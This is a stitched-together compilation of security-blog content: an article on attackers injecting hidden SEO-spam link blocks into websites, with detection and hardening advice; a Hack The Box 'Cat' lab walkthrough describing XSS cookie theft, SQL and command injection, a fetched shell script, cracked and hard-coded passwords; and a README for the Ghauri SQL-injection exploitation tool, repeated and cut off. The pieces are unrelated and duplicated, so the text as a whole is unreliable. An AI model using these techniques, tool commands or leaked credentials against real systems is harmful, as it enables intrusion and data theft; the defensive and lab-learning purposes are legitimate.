• Exploitation of CMS (WordPress, Joomla, Drupal) vulnerabilities. If the engine or plugins are out of date, attackers use known vulnerabilities (SQL Injection, RCE, or XSS) to gain access to the site’s code. After that, depending on the level of access gained by exploiting the vulnerability, they can modify template files (header.php, footer.php, index.php, etc.), insert invisible blocks into arbitrary site pages, and so on.
  In SQL injection attacks, the hacker injects their malicious SQL code into a database query. Many websites, from news portals to online stores, store their content (text, product descriptions, and news) in a database. If an SQL query, such as SELECT * FROM posts WHERE id = '$id' allows passing arbitrary data, the attacker can use the $id field to inject their code. This allows the attacker to change the content of records, for example, by inserting HTML with hidden blocks.
  In RCE (remote code execution) attacks, the attacker gains the ability to run their own commands on the server where the website runs. Unlike SQL injections, which are limited to the database, RCE provides almost complete control over the system. For example, it allows the attacker to create or modify site files, upload malicious scripts, and, of course, inject invisible blocks.
  In an XSS (cross-site scripting) attack, the attacker injects their JavaScript code directly into the web page by using vulnerable input fields, such as those for comments or search queries. When another user visits this page, the malicious script automatically executes in their browser. Such a script enables the attacker to perform various malicious actions, including stealthily adding a hidden <div> block with invisible links to the page. For XSS, the attacker does not need direct access to the server or database, as in the case with SQL injection or RCE; they only need to find a single vulnerability on the website.
• An attack via the hosting provider. In addition to directly hacking the target website, an attacker may attempt to gain access to the website through the hosting environment. If the hosting provider’s server is poorly secured, there is a risk of it being compromised. Furthermore, if multiple websites or web applications run on the same server, a vulnerability in one of them can jeopardize all other projects. The attacker’s capabilities depend on the level of access to the server. These capabilities may include: injecting hidden blocks into page templates, substituting files, modifying databases, connecting external scripts to multiple websites simultaneously, and so forth. Meanwhile, the website administrator may not notice the problem because the vulnerability is being exploited within the server environment rather than the website code.

Note that hidden links appearing on a website is not always a sign of a cyberattack. The issue often arises during the development phase, for example, if an illegal copy of a template is downloaded to save money or if the project is executed by an unscrupulous web developer.

Why attackers place hidden blocks on websites

One of the most obvious goals for injecting hidden blocks into other people’s websites is to steal the PageRank from the victim. The more popular and authoritative the website is, the more interesting it is to attackers. However, this does not mean that moderate- or low-traffic websites are safe. As a rule, administrators of popular websites and large platforms do their best to adhere to security rules, so it is not so easy to get close to them. Therefore, attackers may target less popular – and less protected – websites.

As previously mentioned, this approach to promoting websites is easily detected and blocked by search engines. In the short term, though, attackers still benefit from this: they manage to drive traffic to the websites that interest them until search engine algorithms detect the violation.

Even though the user does not see the hidden block and cannot click the links, attackers can use scripts to boost traffic to their websites. One possible scenario involves JavaScript creating an iframe in the background or sending an HTTP request to the website from the hidden block, which then receives information about the visit.

Hidden links can lead not just to pornographic or other questionable websites but also to websites with low-quality content whose sole purpose is to be promoted and subsequently sold, or to phishing and malicious websites. In more sophisticated schemes, the script that provides “visits” to such websites may load malicious code into the victim’s browser.

Finally, hidden links allow attackers to lower the reputation of the targeted website and harm its standing with search engines. This threat is especially relevant in light of the fact that algorithms such as Google Penguin penalize websites hosting questionable links. Attackers may use these techniques as a tool for unfair competition, hacktivism, or any other activity that involves discrediting certain organizations or individuals.

Interestingly, in 2025, we have more frequently encountered hidden blocks with links to pornographic websites and online casinos on various legitimate websites. With low confidence, we can suggest that this is partly due to the development of neural networks, which make it easy to automate such attacks, and partly due to the regular updates to Google’s anti-spam systems, the latest of which was completed at the end of September 2025: attackers may have rushed to maximize their gains before the search engine made it a little harder for them.

Consequences for the victim website

The consequences for the victim website can vary in severity. At a minimum, the presence of hidden links placed by unauthorized parties hurts search engine reputation, which may lead to lower search rankings or even complete exclusion from search results. However, even without any penalties, the links disrupt the internal linking structure because they lead to external websites and pass on a portion of the victim’s weight to them. This negatively impacts the rankings of key pages.

Although unseen by visitors, hidden links can be discovered by external auditors, content analysis systems, or researchers who report such findings in public reports. This is something that can undermine trust in the website. For example, sites where our categorization engine detects links to pornography pages will be classified as “Adult content”. Consequently, all of our clients who use web filters to block this category will be unable to visit the website. Furthermore, information about a website’s category is published on our Kaspersky Threat Intelligence Portal and available to anyone wishing to look up its reputation.

If the website is being used to distribute illegal or fraudulent content, the issue enters the legal realm, with the owner potentially facing lawsuits from copyright holders or regulators. For example, if the links lead to websites that distribute pirated content, the site may be considered an intermediary in copyright infringement. If the hidden block contains malicious scripts or automatic redirects to questionable websites, such as phishing pages, the owner can be charged with fraud or some other cybercrime.

How to detect a hidden link block on your website

The simplest and most accessible method for any user to check a website for a hidden block is to view its source code in the browser. This is very easy to do. Navigate to the website, press Control+U, and the website’s code will open in the next tab. Search (Control+F) the code for the following keywords: display: none, visibility: hidden, opacity: 0, height: 0, width: 0, position: absolute. In addition, you can check for keywords that are characteristic of the hidden content itself. When it comes to links that point to adult or gambling sites, you should look for porn, sex, casino, card, and the like.

A slightly more complex method is using web developer tools to investigate the DOM for invisible blocks. After the page fully loads, open DevTools (F12) in the browser and go to the Elements tab. Search (Control+F) for keywords such as <a, iframe, display: none, hidden, opacity. Hover your cursor over suspicious elements in the code so the browser highlights their location on the page. If the block occupies zero area or is located outside the visible area, that is an indicator of a hidden element. Check the Computed tab for the selected element; there, you can see the applied CSS styles and confirm that it is hidden from the user’s view.

You can also utilize specialized SEO tools. These are typically third-party solutions that scan website SEO data and generate reports. They can provide a report about suspicious links as well. Few of them are free, but when selecting a tool, you should be guided primarily by the vendor’s reputation rather than price. It is better to use tried-and-true, well-known services that are known to be free of malicious or questionable payloads. Examples of these trusted services include Google Search Console, Bing Webmaster Tools, OpenLinkProfiler, and SEO Minion.

Another way to discover hidden SEO spam on a website is to check the CMS itself and its files. First, you should scan the database tables for suspicious HTML tags with third-party links that may have been inserted by attackers, and also carefully examine the website’s template files (header.php, footer.php, and index.php) and included modules for unfamiliar or suspicious code. Pay particular attention to encrypted insertions, unclear scripts, or links that should not originally be present in the website’s structure.

Additionally, you can look up your website’s reputation on the Kaspersky Threat Intelligence Portal. If you find it in an uncharacteristic category – typically “Adult content”, “Sexually explicit”, or “Gambling” – there is a high probability that there is a hidden SEO spam block embedded in your website.

How to protect your website

To prevent hidden links from appearing on your website, avoid unlicensed templates, themes, and other pre-packaged solutions. The entire site infrastructure must be built only on licensed and official solutions. The same principle applies to webmasters and companies you hire to build your website: we recommend checking their work for hidden links, but also for vulnerabilities in general. Never cut corners when it comes to security.

Keep your CMS, themes, and plugins up to date, as new versions often patch known vulnerabilities that attackers can exploit. Delete any unused plugins and themes, if any. The less unnecessary components are installed, the lower the risk of an exploit in one of the extensions, plugins, and themes. It is worth noting that this risk never disappears completely – it is still there even if you have a minimal set of components as long as they are outdated or poorly secured.

To protect files and the server, it is important to properly configure access permissions. On servers running Linux and other Unix-like systems, use 644 for files and 755 for folders. This means that the owner can open folders, and read and modify folders and files, while the group and other users can only read files and open folders. If write access is not necessary, for example in template folders, forbid it altogether to lower the risk of malicious actors making unauthorized changes. Furthermore, you must set up regular, automatic website backups so that data can be quickly restored if there is an issue.

Additionally, it is worth using web application firewalls (WAFs), which help block malicious requests and protect the site from external attacks. This solution is available in Kaspersky DDoS Protection.

To protect the administrator panel, use only strong passwords and 2FA (Two-Factor Authentication) at all times. You would be well-advised to restrict access to the admin panel by IP address if you can. Only a limited group of individuals should be granted admin privileges.

Introduction

This write-up details the “Cat” machine from Hack The Box, a Medium-rated Linux challenge.

Objective on Cat Machine

The goal is to complete the “Cat” machine by accomplishing the following objectives:

User Flag:

To obtain the user flag, an attacker first exploits a Stored Cross-Site Scripting (XSS) vulnerability in the user registration form, which allows stealing the administrator’s session cookie. With this stolen session, the attacker accesses the admin panel and exploits an SQL Injection flaw to extract sensitive user credentials from the database. After cracking these credentials, SSH access is gained as a regular user, enabling the retrieval of the user flag—a secret token proving user-level access.

Root Flag:

For the root flag, privilege escalation is performed by finding a vulnerable image processing script owned by the root user. The attacker crafts a malicious image payload that executes unauthorised commands with root privileges. This leads to obtaining a root shell—the highest level of system access—allowing capture of the root flag, which confirms full control over the machine.

Reconnaissance and Enumeration on Cat Machine

Establishing Connectivity

I connected to the Hack The Box environment via OpenVPN using my credentials, running all commands from a Parrot OS virtual machine. The target IP address for the Dog machine was 10.10.11.53.

Initial Scanning

To identify open ports and services, I ran an Nmap scan:

nmap -sC -sV 10.10.11.53 -oA initial

nmap -sC -sV 10.10.11.53 -oA initial

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/cat]
└──╼ $ nmap -sC -sV -oA initial -Pn 10.10.11.53
# Nmap 7.94SVN scan initiated Tue Jun 17 10:05:26 2025 as: nmap -sC -sV -oA initial -Pn 10.10.11.53
Nmap scan report for 10.10.11.53
Host is up (0.017s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_  256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://cat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 17 10:05:33 2025 -- 1 IP address (1 host up) scanned in 7.38 seconds

┌─[dark@parrot]─[~/Documents/htb/cat]
└──╼ $ nmap -sC -sV -oA initial -Pn 10.10.11.53
# Nmap 7.94SVN scan initiated Tue Jun 17 10:05:26 2025 as: nmap -sC -sV -oA initial -Pn 10.10.11.53
Nmap scan report for 10.10.11.53
Host is up (0.017s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_  256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://cat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 17 10:05:33 2025 -- 1 IP address (1 host up) scanned in 7.38 seconds

Analysis:

• Port 22 (SSH): OpenSSH 8.2p1 on Ubuntu 4ubuntu0.11 risks remote code execution if unpatched (e.g., CVE-2021-28041).
• Port 80 (HTTP): Apache 2.4.41, vulnerable to path traversal (CVE-2021-41773), redirects to cat.htb, hinting at virtual host misconfigurations.

Web Enumeration:

Perform directory fuzzing to uncover hidden files and directories.

gobuster dir -u http://cat.htb -w /opt/common.txt

gobuster dir -u http://cat.htb -w /opt/common.txt

Let’s perform directory enumeration with Gobuster to identify any potentially useful resources.

Gobuster Output:

Web Path Discovery (Gobuster):

• /.git Directory: Exposed Git repository risks source code leakage, revealing sensitive data like credentials or application logic.
• /admin.php, /join.php, and Other Paths: Discovered sensitive endpoints may lack authentication, enabling unauthorised access or privilege escalation.

The website features a typical interface with user registration, login, and image upload functionalities, but the presence of an exposed .git directory and accessible admin endpoints indicate significant security vulnerabilities.

Git Repository Analysis with git-dumper

Utilised the git-dumper tool to clone the exposed Git repository by executing the command git-dumper http://cat.htb/.git/ git. Subsequently, employed a Git extraction tool to retrieve critical source code files, including join.php, admin.php, and accept_cat.php, for further analysis.

Within the cloned Git repository, several PHP files were identified, meriting further examination for potential vulnerabilities or insights.

Source Code Analysis and Review on Cat Machine

Source Code Review of accept_cat.php

The accept_cat.php file is intended to let the admin user 'axel' Accept a cat by inserting its name into the accepted_cats table and deleting the corresponding entry from the cats table. The script correctly verifies the user’s session and restricts actions to POST requests, which is good practice. However, it constructs the insertion SQL query by directly embedding the $cat_name variable without any sanitisation or use of prepared statements:

$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
$pdo->exec($sql_insert);

$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
$pdo->exec($sql_insert);

This exposes the application to SQL injection attacks, as malicious input in catName could manipulate the query and compromise the database. On the other hand, the deletion query is properly parameterised, reducing risk. To secure the script, the insertion should also use prepared statements with bound parameters. Overall, while session checks and request validation are handled correctly, the insecure insertion query represents a critical vulnerability in accept_cat.php.

Vulnerability Review of admin.php

This admin page lets the user ‘axel’ manage cats by viewing, accepting, or rejecting them. It correctly checks if the user is logged in as ‘axel’ before allowing access and uses prepared statements to fetch cat data from the database safely. The cat details are displayed with proper escaping to prevent cross-site scripting attacks.

However, the page sends AJAX POST requests to accept_cat.php and delete_cat.php without any protection against Cross-Site Request Forgery (CSRF). This means an attacker could potentially trick the admin into performing actions without their consent. Also, based on previous code, the accept_cat.php script inserts data into the database without using prepared statements, which can lead to SQL injection vulnerabilities.

To fix these issues, CSRF tokens should be added to the AJAX requests and verified on the server side. Additionally, all database queries should use prepared statements to ensure user input is handled securely. While the page handles session checks and output escaping well, the missing CSRF protection and insecure database insertion are serious security concerns.

Security Audit of view_cat.php

The view_cat.php script restricts access to the admin user 'axel' and uses prepared statements to safely query the database, preventing SQL injection. However, it outputs dynamic data such as cat_name, photo_path, age, birthdate, weight, username, and created_at directly into the HTML without escaping. This creates a Cross-Site Scripting (XSS) vulnerability because if any of these fields contain malicious code, it will execute in the admin’s browser.

The vulnerable code includes:

Cat Details: <?php echo $cat['cat_name']; ?>
<img src="<?php echo $cat['photo_path']; ?>" alt="<?php echo $cat['cat_name']; ?>" class="cat-photo">
<strong>Name:</strong> <?php echo $cat['cat_name']; ?><br>
<strong>Age:</strong> <?php echo $cat['age']; ?><br>
</code>

Cat Details: <?php echo $cat['cat_name']; ?>
<img src="<?php echo $cat['photo_path']; ?>" alt="<?php echo $cat['cat_name']; ?>" class="cat-photo">
<strong>Name:</strong> <?php echo $cat['cat_name']; ?><br>
<strong>Age:</strong> <?php echo $cat['age']; ?><br>
</code>

To mitigate this, all output should be passed through htmlspecialchars() to encode special characters and prevent script execution. Additionally, validating the image src attribute is important to avoid loading unsafe or external resources. Without these measures, the page remains vulnerable to XSS attacks.

Input Validation Analysis of join.php

The provided PHP code is vulnerable to several security issues, primarily due to improper input handling and weak security practices. Below is an explanation of the key vulnerabilities, followed by the relevant code snippets:

1. Cross-Site Scripting (XSS): The code outputs $success_message and $error_message without sanitisation, making it susceptible to XSS attacks. User inputs (e.g., $_GET['username'], $_GET['email']) are directly echoed, allowing malicious scripts to be injected.

<?php if ($success_message != ""): ?>
   <div class="message"><?php echo $success_message; ?></div>
   <?php endif; ?>
   <?php if ($error_message != ""): ?>
   <div class="error-message"><?php echo $error_message; ?></div>
   <?php endif; ?>

<?php if ($success_message != ""): ?>
   <div class="message"><?php echo $success_message; ?></div>
   <?php endif; ?>
   <?php if ($error_message != ""): ?>
   <div class="error-message"><?php echo $error_message; ?></div>
   <?php endif; ?>

2. Insecure Password Storage: Passwords are hashed using MD5 (md5($_GET['password'])), which is cryptographically weak and easily cracked.

$password = md5($_GET['password']);

$password = md5($_GET['password']);

3. SQL Injection Risk: While prepared statements are used, the code still processes unsanitized $_GET inputs, which could lead to other injection vulnerabilities if not validated properly.
4. Insecure Data Transmission: Using $_GET for sensitive data like passwords, exposing them in URLs risks interception.

To mitigate these, use htmlspecialchars() for output, adopt secure hashing (e.g., password_hash()), validate inputs, and use $_POST for sensitive data.

Workflow Evaluation of contest.php

The PHP code for the cat contest registration page has multiple security flaws due to weak input handling and poor security practices. Below are the key vulnerabilities with relevant code snippets:

Cross-Site Scripting (XSS): The $success_message and $error_message are output without sanitization, enabling reflected XSS attacks via crafted POST inputs (e.g., cat_name=<script>alert(‘XSS’)</script>).

<?php if ($success_message): ?>
    <div class="message"><?php echo $success_message; ?></div>
<?php endif; ?>
<?php if ($error_message): ?>
    <div class="error-message"><?php echo $error_message; ?></div>
<?php endif; ?>

<?php if ($success_message): ?>
    <div class="message"><?php echo $success_message; ?></div>
<?php endif; ?>
<?php if ($error_message): ?>
    <div class="error-message"><?php echo $error_message; ?></div>
<?php endif; ?>

• Weak Input Validation: The regex (/[+*{}’,;<>()\\[\\]\\/\\:]/) in contains_forbidden_content is too permissive, allowing potential XSS or SQL injection bypasses.

$forbidden_patterns = "/[+*{}',;<>()\\[\\]\\/\\:]/";

$forbidden_patterns = "/[+*{}',;<>()\\[\\]\\/\\:]/";

• Insecure File Upload: The file upload trusts getimagesize and uses unsanitized basename($_FILES[“cat_photo”][“name”]), risking directory traversal or malicious file uploads.

$target_file = $target_dir . $imageIdentifier . basename($_FILES["cat_photo"]["name"]);

$target_file = $target_dir . $imageIdentifier . basename($_FILES["cat_photo"]["name"]);

To mitigate, sanitize outputs with htmlspecialchars(), use stricter input validation (e.g., FILTER_SANITIZE_STRING), sanitize file names, restrict upload paths, and validate file contents thoroughly.

User Registration and Login

Clicking the contest endpoint redirects to the join page, which serves as the registration page.

Let’s create a new account by completing the registration process.

The registration process was completed successfully, confirming that new user accounts can be created without errors or restrictions.

Logging in with the credentials we created was successful.

After a successful login, the contest page is displayed as shown above.

Let’s complete the form and upload a cat photo as required.

Successfully submitted the cat photo for inspection.

Exploiting XSS to Steal Admin Cookie for Cat Machine

Initialise the listener.

Injected a malicious XSS payload into the username field.

Let’s create a new account by injecting malicious XSS code into the Username field while keeping all other inputs valid.

Let’s fill out the form with normal inputs as before.

The process may take a few seconds or minutes, depending on the response time. I have attempted multiple times to ensure it works successfully.

Used Firefox Dev Tools to set the cookie and gain access to admin features

Once we obtain the token hash, we need to copy and paste it into Firefox’s inspector to proceed further.

After that, simply refresh the page, and you will notice a new “Admin” option has appeared in the menu bar.

Clicking the Admin option in the menu bar redirects us to the page shown above.

Click the accept button to approve the submitted picture.

Leveraging XSS Vulnerability to Retrieve Admin Cookie for Cat Machine

Used Burp Suite to analyze POST requests.

Use Burp Suite to examine network packets for in-depth analysis.

Test the web application to determine if it is vulnerable to SQL injection attacks.

Attempting to inject the SQL command resulted in an “access denied” error, likely due to a modified or invalid cookie.

SQL Injection and Command Execution

After reconstructing the cookie, the SQL injection appears to function as anticipated.

Successfully executed command injection.

We can use the curl command to invoke the malicious file and execute it. The fact that it’s hanging is promising, indicating potential success.

It was observed that bash.sh has been transferred to the victim’s machine.

Success! A shell was obtained as the www-data user.

Database Enumeration

It’s unusual to find cat.db while searching for the database file.

Transfer the SQL file to our local machine.

We discovered that cat.db is a SQLite 3.x database.

sqlite3 cat.db opens the cat.db file using the SQLite command-line tool, allowing you to interact with the database—run queries, view tables, and inspect its contents.

The cat.db database contains three tables: accepted_cats, cats, and users, which likely stores approved cat entries, general cat data, and user information, respectively.

Immediate cracking is possible for some obtained hashes.

The screenshot shows the hashes after I rearranged them for clarity.

Breaking Password Security: Hashcat in Action

We need to specify the hash mode, which in this case could be MD5.

We successfully cracked the hash for the user Rosa, revealing the password: soyunaprincesarosa.

Boom! We successfully gained access using Rosa’s password.

The access.log file reveals the password for Axel.

The user Axel has an active shell account.

The credentials for Axel, including the password, were verified successfully.

Access is achievable via either pwncat-cs or SSH.

Executing the appropriate command retrieves the user flag.

Escalate to Root Privileges Access on Cat Machine

Privilege Escalation

The Axel user does not have sudo privileges on the cat system.

Email Analysis

We can read the message sent from Rosa to Axel.

The emails are internal updates from Rosa about two upcoming projects. In the first message, Rosa mentions that the team is working on launching new cat-related web services, including a site focused on cat care. Rosa asks Axel to send details about his Gitea project idea to Jobert, who will evaluate whether it’s worth moving forward with. Rosa also notes that the idea should be clearly explained, as she plans to review the repository herself. In the second email, Rosa shares that they’re building an employee management system. Each department admin will have a defined role, and employees will be able to view their tasks. The system is still being developed and is hosted on their private Gitea platform. Rosa includes a link to the repository and its README file, which has more information and updates. Both emails reflect early planning stages and call for team involvement and feedback.

Checking the machine’s open ports reveals that port 3000 is accessible.

Therefore, we need to set up port forwarding for port 3000.

Gitea Exploitation on Cat Machine

The service running on port 3000 is the Gitea web interface.

Using Axel’s credentials, we successfully logged in.

Gitea service is running version 1.22.0, which may contain specific features and known vulnerabilities relevant for further evaluation.

Start the Python server to serve files or host a payload for the next phase of the assessment.

Inject the XSS payload as shown above.

The fake email is sent to the user jobert to test the functionality.

Obtained a base64-encoded cookie ready for decoding.

The decoded cookie appears to contain the username admin.

Edit the file within the Gitea application.

Obtained the token as shown above.

<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) || 
    $_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {
    
    header('WWW-Authenticate: Basic realm="Employee Management"');
    header('HTTP/1.0 401 Unauthorized');
    exit;
}

<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) || 
    $_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {
    
    header('WWW-Authenticate: Basic realm="Employee Management"');
    header('HTTP/1.0 401 Unauthorized');
    exit;
}

This PHP script enforces HTTP Basic Authentication by verifying the client’s username and password against predefined valid credentials: the username “admin” and the password “IKw75eR0MR7CMIxhH0.” Upon receiving a request, the script checks for authentication headers and validates them. If the credentials are missing or incorrect, it responds with a 401 Unauthorised status and prompts the client to authenticate within the “Employee Management” realm.

The password discovered grants root access and functions as an administrator password on Windows machines.

Executing the appropriate command retrieves the root flag.

The post Hack The Box: Cat Machine Walkthrough – Medium Diffculity appeared first on Threatninja.net.

An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws

Requirements

• Python 3
• Python pip3

Installation

• cd to ghauri directory.
• install requirements: python3 -m pip install --upgrade -r requirements.txt
• run: python3 setup.py install or python3 -m pip install -e .
• you will be able to access and run the ghauri with simple ghauri --help command.

Download Ghauri

You can download the latest version of Ghauri by cloning the GitHub repository.

git clone https://github.com/r0oth3x49/ghauri.git

Features

• Supports following types of injection payloads:
  • Boolean based.
  • Error Based
  • Time Based
  • Stacked Queries
• Support SQL injection for following DBMS.
  • MySQL
  • Microsoft SQL Server
  • Postgre
  • Oracle
• Supports following injection types.
  • GET/POST Based injections
  • Headers Based injections
  • Cookies Based injections
  • Mulitipart Form data injections
  • JSON based injections
• support proxy option --proxy.
• supports parsing request from txt file: switch for that -r file.txt
• supports limiting data extraction for dbs/tables/columns/dump: swicth --start 1 --stop 2
• added support for resuming of all phases.
• added support for skip urlencoding switch: --skip-urlencode
• added support to verify extracted characters in case of boolean/time based injections.

Advanced Usage

Author: Nasir khan (r0ot h3x49)

usage: ghauri -u URL [OPTIONS]

A cross-platform python based advanced sql injections detection & exploitation tool.

General:
  -h, --help          Shows the help.
  --version           Shows the version.
  -v VERBOSE          Verbosity level: 1-5 (default 1).
  --batch             Never ask for user input, use the default behavior
  --flush-session     Flush session files for current target

Target:
  At least one of these options has to be provided to define the
  target(s)

  -u URL, --url URL   Target URL (e.g. 'http://www.site.com/vuln.php?id=1).
  -r REQUESTFILE      Load HTTP request from a file

Request:
  These options can be used to specify how to connect to the target URL

  -A , --user-agent   HTTP User-Agent header value -H , --header       Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
  --host              HTTP Host header value
  --data              Data string to be sent through POST (e.g. "id=1")
  --cookie            HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
  --referer           HTTP Referer header value
  --headers           Extra headers (e.g. "Accept-Language: fr\nETag: 123")
  --proxy             Use a proxy to connect to the target URL
  --delay             Delay in seconds between each HTTP request
  --timeout           Seconds to wait before timeout connection (default 30)
  --retries           Retries when the connection related error occurs (default 3)
  --skip-urlencode    Skip URL encoding of payload data
  --force-ssl         Force usage of SSL/HTTPS

Injection:
  These options can be used to specify which paramete   rs to test for,
  provide custom injection payloads and optional tampering scripts

  -p TESTPARAMETER    Testable parameter(s)
  --dbms DBMS         Force back-end DBMS to provided value
  --prefix            Injection payload prefix string
  --suffix            Injection payload suffix string

Detection:
  These options can be used to customize the detection phase

  --level LEVEL       Level of tests to perform (1-3, default 1)
  --code CODE         HTTP code to match when query is evaluated to True
  --string            String to match when query is evaluated to True
  --not-string        String to match when query is evaluated to False
  --text-only         Compare pages based only on the textual content

Techniques:
  These options can be used to tweak testing of specific SQL injection
  techniques

     --technique TECH    SQL injection techniques to use (default "BEST")
  --time-sec TIMESEC  Seconds to delay the DBMS response (default 5)

Enumeration:
  These options can be used to enumerate the back-end database
  managment system information, structure and data contained in the
  tables.

  -b, --banner        Retrieve DBMS banner
  --current-user      Retrieve DBMS current user
  --current-db        Retrieve DBMS current database
  --hostname          Retrieve DBMS server hostname
  --dbs               Enumerate DBMS databases
  --tables            Enumerate DBMS database tables
  --columns           Enumerate DBMS database table columns
  --dump              Dump DBMS database table entries
  -D DB               DBMS database to enumerate
  -T TBL              DBMS database tables(s) to enumerate
  -C COLS                DBMS database table column(s) to enumerate
  --start             Retrive entries from offset for dbs/tables/columns/dump
  --stop              Retrive entries till offset for dbs/tables/columns/dump

Example:
  ghauri http://www.site.com/vuln.php?id=1 --dbs

Legal disclaimer

Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local,state and federal laws. 
Developer assume no liability and is not responsible for any misuse or damage caused by this program.

TODO

• Add support for inline queries.
• Add support for Union based queries

Continue readingDC-9 Vulnhub Walkthrough – OSCP way

The post Detectify security updates for 4 April appeared first on Detectify Blog.

The post Newly added security tests, June 21, 2017: XSS and SQL injection modules appeared first on Detectify Blog.

The post Newly Added Security Tests, February 3, 2017: WordPress plugins and Elastic search appeared first on Detectify Blog.

The post [Release] New modules appeared first on Detectify Blog.

The post OWASP TOP 10: Injection appeared first on Detectify Blog.

The post What is an SQL Injection and how do you fix it? appeared first on Detectify Blog.

The post New vulnerability findings: Joomla, JBoss, Jenkins and others! appeared first on Detectify Blog.

The post SQL Injection in 1 min! appeared first on Detectify Blog.

An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws

Requirements

• Python 3
• Python pip3

Installation

• cd to ghauri directory.
• install requirements: python3 -m pip install --upgrade -r requirements.txt
• run: python3 setup.py install or python3 -m pip install -e .
• you will be able to access and run the ghauri with simple ghauri --help command.

Download Ghauri

You can download the latest version of Ghauri by cloning the GitHub repository.

git clone https://github.com/r0oth3x49/ghauri.git

Features

• Supports following types of injection payloads:
  • Boolean based.
  • Error Based
  • Time Based
  • Stacked Queries
• Support SQL injection for following DBMS.
  • MySQL
  • Microsoft SQL Server
  • Postgre
  • Oracle
• Supports following injection types.
  • GET/POST Based injections
  • Headers Based injections
  • Cookies Based injections
  • Mulitipart Form data injections
  • JSON based injections
• support proxy option --proxy.
• supports parsing request from txt file: switch for that -r file.txt
• supports limiting data extraction for dbs/tables/columns/dump: swicth --start 1 --stop 2
• added support for resuming of all phases.
• added support for skip urlencoding switch: --skip-urlencode
• added support to verify extracted characters in case of boolean/time based injections.

Advanced Usage

Author: Nasir khan (r0ot h3x49)

usage: ghauri -u URL [OPTIONS]

A cross-platform python based advanced sql injections detection & exploitation tool.

General:
  -h, --help          Shows the help.
  --version           Shows the version.
  -v VERBOSE          Verbosity level: 1-5 (default 1).
  --batch             Never ask for user input, use the default behavior
  --flush-session     Flush session files for current target

Target:
  At least one of these options has to be provided to define the
  target(s)

  -u URL, --url URL   Target URL (e.g. 'http://www.site.com/vuln.php?id=1).
  -r REQUESTFILE      Load HTTP request from a file

Request:
  These options can be used to specify how to connect to the target URL

  -A , --user-agent   HTTP User-Agent header value -H , --header       Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
  --host              HTTP Host header value
  --data              Data string to be sent through POST (e.g. "id=1")
  --cookie            HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
  --referer           HTTP Referer header value
  --headers           Extra headers (e.g. "Accept-Language: fr\nETag: 123")
  --proxy             Use a proxy to connect to the target URL
  --delay             Delay in seconds between each HTTP request
  --timeout           Seconds to wait before timeout connection (default 30)
  --retries           Retries when the connection related error occurs (default 3)
  --skip-urlencode    Skip URL encoding of payload data
  --force-ssl         Force usage of SSL/HTTPS

Injection:
  These options can be used to specify which paramete   rs to test for,
  provide custom injection payloads and optional tampering scripts

  -p TESTPARAMETER    Testable parameter(s)
  --dbms DBMS         Force back-end DBMS to provided value
  --prefix            Injection payload prefix string
  --suffix            Injection payload suffix string

Detection:
  These options can be used to customize the detection phase

  --level LEVEL       Level of tests to perform (1-3, default 1)
  --code CODE         HTTP code to match when query is evaluated to True
  --string            String to match when query is evaluated to True
  --not-string        String to match when query is evaluated to False
  --text-only         Compare pages based only on the textual content

Techniques:
  These options can be used to tweak testing of specific SQL injection
  techniques

     --technique TECH    SQL injection techniques to use (default "BEST")
  --time-sec TIMESEC  Seconds to delay the DBMS response (default 5)

Enumeration:
  These options can be used to enumerate the back-end database
  managment system information, structure and data contained in the
  tables.

  -b, --banner        Retrieve DBMS banner
  --current-user      Retrieve DBMS current user
  --current-db        Retrieve DBMS current database
  --hostname          Retrieve DBMS server hostname
  --dbs               Enumerate DBMS databases
  --tables            Enumerate DBMS database tables
  --columns           Enumerate DBMS database table columns
  --dump              Dump DBMS database table entries
  -D DB               DBMS database to enumerate
  -T TBL              DBMS database tables(s) to enumerate
  -C COLS                DBMS database table column(s) to enumerate
  --start             Retrive entries from offset for dbs/tables/columns/dump
